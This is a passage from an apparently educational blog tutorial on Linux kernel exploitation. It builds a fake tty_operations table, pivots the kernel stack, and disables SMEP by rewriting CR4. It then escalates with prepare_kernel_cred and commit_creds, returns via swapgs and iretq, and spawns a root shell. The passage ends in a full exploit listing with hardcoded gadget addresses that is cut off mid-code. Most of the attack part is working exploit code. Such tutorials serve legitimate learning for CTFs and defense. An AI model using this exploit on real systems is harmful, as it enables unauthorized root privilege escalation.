class="number">0</span>, <span class="number">0</span>, <span 
class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>, <span class="number">0</span>,</span><br><span class="line">    xchg_eax_esp_addr, <span class="comment">// int  (*write)(struct tty_struct*, const unsigned char *, int)</span></span><br><span class="line">&#125;;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] fake_tty_ops constructed\n&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">u_int64_t</span> hijacked_stack_addr = ((<span class="type">u_int64_t</span>)fake_tty_ops &amp; <span class="number">0xffffffff</span>);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] hijacked_stack addr: %p\n&quot;</span>, (<span class="type">char</span>*)hijacked_stack_addr);</span><br><span class="line"></span><br><span class="line"><span class="type">char</span>* fake_stack = <span class="literal">NULL</span>;</span><br><span class="line"><span class="keyword">if</span> ((fake_stack = <span class="built_in">mmap</span>(</span><br><span class="line">    (<span class="type">char</span>*)(hijacked_stack_addr &amp; (~<span class="number">0xfff</span>)),    <span class="comment">// addr, page-aligned</span></span><br><span class="line">    <span class="number">0x1000</span>,                                     <span class="comment">// length</span></span><br><span class="line">    PROT_READ | PROT_WRITE,                     <span class="comment">// prot</span></span><br><span class="line">    MAP_PRIVATE | MAP_ANONYMOUS,                <span class="comment">// flags</span></span><br><span class="line">    <span class="number">-1</span>,                                         <span class="comment">// fd</span></span><br><span class="line">    <span class="number">0</span>)                                          <span class="comment">// offset</span></span><br><span class="line">    ) == MAP_FAILED)  </span><br><span 
class="line">    <span class="built_in">perror</span>(<span class="string">&quot;mmap&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Touch the page up front so it is already mapped when debugging</span></span><br><span class="line">fake_stack[<span class="number">0</span>] = <span class="number">0</span>;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+]     fake_stack addr: %p\n&quot;</span>, fake_stack);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Read the head of tty_struct, up to and including the ops pointer</span></span><br><span class="line"><span class="type">int</span> ops_ptr_offset = <span class="number">4</span> + <span class="number">4</span> + <span class="number">8</span> + <span class="number">8</span>;</span><br><span class="line"><span class="type">char</span> overwrite_mem[ops_ptr_offset + <span class="number">8</span>];</span><br><span class="line"><span class="type">char</span>** ops_ptr_addr = (<span class="type">char</span>**)(overwrite_mem + ops_ptr_offset);</span><br><span class="line"></span><br><span class="line"><span class="built_in">read</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] origin ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Patch the ops pointer and write the data back over tty_struct</span></span><br><span class="line">*ops_ptr_addr = (<span class="type">char</span>*)fake_tty_ops;</span><br><span class="line"><span class="built_in">write</span>(fd2, overwrite_mem, <span class="built_in">sizeof</span>(overwrite_mem));</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;[+] hacked ops ptr addr: %p\n&quot;</span>, *ops_ptr_addr);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Trigger tty_write</span></span><br><span class="line"><span 
class="comment">// Note: the buf pointer passed to write must be valid, otherwise the call returns EFAULT early</span></span><br><span class="line"><span class="type">char</span> buf[<span class="number">8</span>] = &#123;<span class="number">0</span>&#125;;</span><br><span class="line"><span class="built_in">write</span>(master_fd, buf, <span class="number">8</span>);</span><br></pre></td></tr></table></figure><p>As shown below, the stack pointer has been pivoted into user space:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013163918810.png" alt="image-20211013163918810"></p><h6 id="4-2-关闭-SMEP-ret2usr提权">4.2) Disabling SMEP + ret2usr privilege escalation</h6><p>With the stack pointer hijacked, we can now attempt privilege escalation. Normally, the following code has to run in the <strong>kernel</strong> to do so:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">cred</span> * root_cred = <span class="built_in">prepare_kernel_cred</span>(<span class="literal">NULL</span>);</span><br><span class="line"><span class="built_in">commit_creds</span>(root_cred);</span><br></pre></td></tr></table></figure><p><code>prepare_kernel_cred</code> builds a new cred structure based on the <code>task_struct</code> pointer passed in. Note that if the pointer is <strong>NULL</strong>, <strong>the returned cred is a copy of init_cred, whose uid, gid, and so on are all root-level</strong>.</p><p><code>commit_creds</code> installs the <code>cred</code> structure passed in as the current process's <code>cred</code>. Installing a root-level cred on the current process achieves the privilege escalation.</p><p>To keep the exploit simple, we can first disable SMEP and then jump into user code to run the precompiled privilege-escalation routine directly.</p><p>The SMEP flag lives in the CR4 register (bit 20), so we can disable SMEP by rewriting CR4 and then escalate:</p><p><img src="/2021/10/kernel_pwn_introduction/c76896800a175ad42f2bcdd31c5c083f.png" alt="image"></p><p>First, look at the current value of the cr4 register:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013172645328.png" alt="image-20211013172645328"></p><p>After that, we only need to overwrite cr4 with 0x6f0, a value in which the SMEP bit is clear.</p><p>The implementation is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">set_root_cred</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="type">void</span>* (*prepare_kernel_cred)(<span class="type">void</span>*) = (<span class="type">void</span>* (*)(<span class="type">void</span>*))prepare_kernel_cred_addr;</span><br><span class="line">    <span class="built_in">void</span> (*commit_creds)(<span class="type">void</span>*) = (<span class="built_in">void</span> (*)(<span class="type">void</span>*))commit_creds_addr;</span><br><span class="line"></span><br><span class="line">    <span class="type">void</span> * root_cred = <span class="built_in">prepare_kernel_cred</span>(<span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">commit_creds</span>(root_cred);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="comment">// Prepare the ROP chain</span></span><br><span class="line">    <span class="type">u_int64_t</span>* hijacked_stack_ptr = (<span class="type">u_int64_t</span>*)hijacked_stack_addr;</span><br><span 
class="line">    hijacked_stack_ptr[<span class="number">0</span>] = pop_rdi_addr;              <span class="comment">// pop rdi; ret</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">1</span>] = <span class="number">0x6f0</span>;                     <span class="comment">// new cr4</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">2</span>] = mov_cr4_rdi_pop_rbp_addr;  <span class="comment">// mov cr4, rdi; pop rbp; ret;</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">3</span>] = <span class="number">0</span>;                         <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[<span class="number">4</span>] = (<span class="type">u_int64_t</span>)set_root_cred;  <span class="comment">// set root</span></span><br><span class="line">    <span class="comment">// todo ROP</span></span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h6 id="4-3-返回用户态-get-shell">4.3) Returning to user mode + get shell</h6><blockquote><p>Once the current process has been elevated, all that remains is to <strong>return to user mode</strong> and spawn a new shell.</p><p>You might ask: since we have already hijacked kernel control flow, why not spawn the shell directly? Why go back to user mode at all?</p><p>My understanding is that hijacking kernel control flow disrupts the kernel's normal execution logic, so the kernel is now less robust and even mildly sensitive operations can crash it. The safest approach is to return to the more stable user mode; besides, a user-mode program running as root can accomplish essentially what kernel privileges would let us do.</p><p>There is one more important reason: writing purpose-built code in user space is generally far easier than doing so in kernel space.</p></blockquote><p>How do we get from kernel mode back to user mode? We can start from the syscall entry code, so let's look at it first:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span 
class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">ENTRY(entry_SYSCALL_64)</span><br><span class="line">  SWAPGS_UNSAFE_STACK</span><br><span class="line"><span class="meta">GLOBAL</span>(entry_SYSCALL_64_after_swapgs)</span><br><span class="line">  <span class="keyword">movq</span>  %rsp, PER_CPU_VAR(rsp_scratch)</span><br><span class="line">  <span class="keyword">movq</span>  PER_CPU_VAR(cpu_current_top_of_stack), %rsp</span><br><span class="line"></span><br><span class="line">  /* Construct struct pt_regs on stack */</span><br><span class="line">  pushq  $__USER_DS      /* pt_regs-&gt;<span class="built_in">ss</span> */</span><br><span class="line">  pushq  PER_CPU_VAR(rsp_scratch)  /* pt_regs-&gt;<span class="built_in">sp</span> */</span><br><span class="line"></span><br><span class="line">  ENABLE_INTERRUPTS(CLBR_NONE)</span><br><span class="line">  pushq  %r11        /* pt_regs-&gt;flags */</span><br><span class="line">  pushq  $__USER_CS      /* pt_regs-&gt;<span class="built_in">cs</span> */</span><br><span class="line">  pushq  %rcx        /* pt_regs-&gt;<span class="built_in">ip</span> */</span><br><span class="line">  pushq  %rax        /* pt_regs-&gt;orig_ax */</span><br><span class="line">  pushq  %rdi        /* pt_regs-&gt;<span class="built_in">di</span> */</span><br><span class="line">  pushq  %rsi        /* pt_regs-&gt;<span class="built_in">si</span> */</span><br><span class="line">  pushq  %rdx        /* pt_regs-&gt;<span class="built_in">dx</span> */</span><br><span class="line">  pushq  %rcx        /* pt_regs-&gt;<span class="built_in">cx</span> */</span><br><span class="line">  pushq  $-ENOSYS      /* 
pt_regs-&gt;<span class="built_in">ax</span> */</span><br><span class="line">  pushq  %r8        /* pt_regs-&gt;<span class="built_in">r8</span> */</span><br><span class="line">  pushq  %r9        /* pt_regs-&gt;<span class="built_in">r9</span> */</span><br><span class="line">  pushq  %r10        /* pt_regs-&gt;<span class="built_in">r10</span> */</span><br><span class="line">  pushq  %r11        /* pt_regs-&gt;<span class="built_in">r11</span> */</span><br><span class="line">  <span class="keyword">sub</span>  $(<span class="number">6</span>*<span class="number">8</span>), %rsp      /* pt_regs-&gt;<span class="built_in">bp</span>, <span class="built_in">bx</span>, <span class="built_in">r12</span>-<span class="number">15</span> <span class="keyword">not</span> saved */</span><br></pre></td></tr></table></figure><p>As shown, once control flow reaches the entry point it immediately executes <code>swapgs</code> to switch the GS register to the kernel GS, then switches the stack pointer to the kernel stack and builds a <code>pt_regs</code> structure there.</p><p>The structure is declared as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span 
class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">pt_regs</span> &#123;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * C ABI says these regs are callee-preserved. They aren&#x27;t saved on kernel entry</span></span><br><span class="line"><span class="comment"> * unless syscall needs a complete, fully filled &quot;struct pt_regs&quot;.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r15;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r14;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r13;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r12;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rbp;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rbx;</span><br><span class="line"><span class="comment">/* These regs are callee-clobbered. Always saved on kernel entry. 
*/</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r11;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r10;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r9;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> r8;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rax;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rcx;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rdx;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rsi;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rdi;</span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * On syscall entry, this is syscall#. 
On CPU exception, this is error code.</span></span><br><span class="line"><span class="comment"> * On hw interrupt, it&#x27;s IRQ number:</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> orig_rax;</span><br><span class="line"><span class="comment">/* Return frame for iretq */</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rip;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> cs;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> eflags;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> rsp;</span><br><span class="line">  <span class="type">unsigned</span> <span class="type">long</span> ss;</span><br><span class="line"><span class="comment">/* top of stack page */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>Combined with dynamic debugging, we can see that before control reaches the actual syscall handler, the five values <code>rip</code>, <code>cs</code>, <code>eflags</code>, <code>rsp</code>, and <code>ss</code> of <code>pt_regs</code> have already been pushed onto the stack; together they form the return frame that <code>iretq</code> consumes.</p><p>In the same file we can also find the following snippet:</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">opportunistic_sysret_failed:</span></span><br><span class="line">  <span 
class="keyword">SWAPGS</span></span><br><span class="line">  <span class="keyword">jmp</span>  restore_c_regs_and_iret</span><br><span class="line">  </span><br><span class="line">[...]</span><br><span class="line"></span><br><span class="line">/*</span><br><span class="line"> * <span class="meta">At</span> this label, code paths which return to kernel <span class="keyword">and</span> to user,</span><br><span class="line"> * which come from interrupts/exception <span class="keyword">and</span> from syscalls, merge.</span><br><span class="line"> */</span><br><span class="line"><span class="meta">GLOBAL</span>(restore_regs_and_iret)</span><br><span class="line">  RESTORE_EXTRA_REGS</span><br><span class="line"><span class="symbol">restore_c_regs_and_iret:</span></span><br><span class="line">  RESTORE_C_REGS</span><br><span class="line">  REMOVE_PT_GPREGS_FROM_STACK <span class="number">8</span></span><br><span class="line">  INTERRUPT_RETURN</span><br></pre></td></tr></table></figure><p>From the analysis above, it is easy to infer that returning from kernel mode to user mode requires two steps, in order:</p><ul><li>Execute swapgs once more to switch the GS register from the kernel GS back to the user GS.</li><li>Manually place the five register values that iret needs on the stack, then execute iret.</li></ul><p>The relevant part of the final implementation is therefore:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span 
class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">get_shell</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] got shell, welcome %s\n&quot;</span>, (<span class="built_in">getuid</span>() ? 
<span class="string">&quot;user&quot;</span> : <span class="string">&quot;root&quot;</span>));</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">long</span> user_cs, user_eflags, user_rsp, user_ss;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">save_iret_data</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%cs, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_cs));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pushf&quot;</span>);</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pop %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_eflags));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%rsp, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_rsp));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%ss, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_ss));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">save_iret_data</span>();</span><br><span class="line">    <span class="built_in">printf</span>(</span><br><span class="line">        <span class="string">&quot;[+] iret data saved.\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_cs: %ld\n&quot;</span></span><br><span class="line">        <span 
class="string">&quot;    user_eflags: %ld\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_rsp: %p\n&quot;</span></span><br><span class="line">        <span class="string">&quot;    user_ss: %ld\n&quot;</span>,</span><br><span class="line">        user_cs, user_eflags, (<span class="type">char</span>*)user_rsp, user_ss</span><br><span class="line">    );</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">u_int64_t</span>* hijacked_stack_ptr = (<span class="type">u_int64_t</span>*)hijacked_stack_addr;</span><br><span class="line">    <span class="type">int</span> idx = <span class="number">0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = pop_rdi_addr;              <span class="comment">// pop rdi; ret</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0x6f0</span>;</span><br><span class="line">    hijacked_stack_ptr[idx++] = mov_cr4_rdi_pop_rbp_addr;  <span class="comment">// mov cr4, rdi; pop rbp; ret;</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                         <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)set_root_cred;</span><br><span class="line">    <span class="comment">// newly added ROP chain: swapgs, then iretq back to user mode</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = swapgs_pop_rbp_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = <span class="number">0</span>;                          <span class="comment">// dummy</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = iretq_addr;</span><br><span class="line">    hijacked_stack_ptr[idx++] = (<span class="type">u_int64_t</span>)get_shell;       <span class="comment">// iret_data.rip</span></span><br><span class="line">    hijacked_stack_ptr[idx++] = user_cs;</span><br><span class="line">    
hijacked_stack_ptr[idx++] = user_eflags;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_rsp;</span><br><span class="line">    hijacked_stack_ptr[idx++] = user_ss;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h6 id="4-4-ROP-注意点">4.4) ROP caveats</h6><p>In ordinary user-level exploitation we never need to worry about an inconsequential exception such as a <strong>page fault</strong>. In kernel exploitation, however, page faults are often fatal (recoverable or not; even a perfectly normal page fault can be fatal) and will very likely trigger a <strong>double fault</strong> that reboots the kernel:</p><p><img src="/2021/10/kernel_pwn_introduction/image-20211013173842187.png" alt="image-20211013173842187"></p><p>So when building a ROP chain, avoid as far as possible having the kernel directly reference <strong>memory pages that have not been faulted in yet</strong>.</p><p>Another issue is single-stepping. When debugging a kernel ROP chain, single-stepping sometimes crashes the kernel outright, whereas setting a breakpoint at the target location first and then continuing to it works fine. As for this kind of debugging... your mileage may vary (lol).</p><h6 id="4-5-完整-exploit">4.5) Full exploit</h6><p>The full exploit is shown below:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span 
class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span 
class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;assert.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/ioctl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/mman.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span 
class="keyword">define</span> xchg_eax_esp_addr           0xffffffff8100008a</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> prepare_kernel_cred_addr    0xffffffff810a1810</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> commit_creds_addr           0xffffffff810a1420</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> pop_rdi_addr                0xffffffff810d238d</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> mov_cr4_rdi_pop_rbp_addr    0xffffffff81004d80</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> swapgs_pop_rbp_addr         0xffffffff81063694          </span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> iretq_addr                  0xffffffff814e35ef</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">set_root_cred</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="type">void</span>* (*prepare_kernel_cred)(<span class="type">void</span>*) = (<span class="type">void</span>* (*)(<span class="type">void</span>*))prepare_kernel_cred_addr;</span><br><span class="line">    <span class="built_in">void</span> (*commit_creds)(<span class="type">void</span>*) = (<span class="built_in">void</span> (*)(<span class="type">void</span>*))commit_creds_addr;</span><br><span class="line"></span><br><span class="line">    <span class="type">void</span> * root_cred = <span class="built_in">prepare_kernel_cred</span>(<span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">commit_creds</span>(root_cred);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span 
class="title">get_shell</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;[+] got shell, welcome %s\n&quot;</span>, (<span class="built_in">getuid</span>() ? <span class="string">&quot;user&quot;</span> : <span class="string">&quot;root&quot;</span>));</span><br><span class="line">    <span class="built_in">system</span>(<span class="string">&quot;/bin/sh&quot;</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="type">unsigned</span> <span class="type">long</span> user_cs, user_eflags, user_rsp, user_ss;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">save_iret_data</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%cs, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_cs));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pushf&quot;</span>);</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;pop %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_eflags));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%rsp, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_rsp));</span><br><span class="line">    __asm__ __volatile__ (<span class="string">&quot;mov %%ss, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (user_ss));</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">save_iret_data</span>();</span><br><span class="line">    <span 
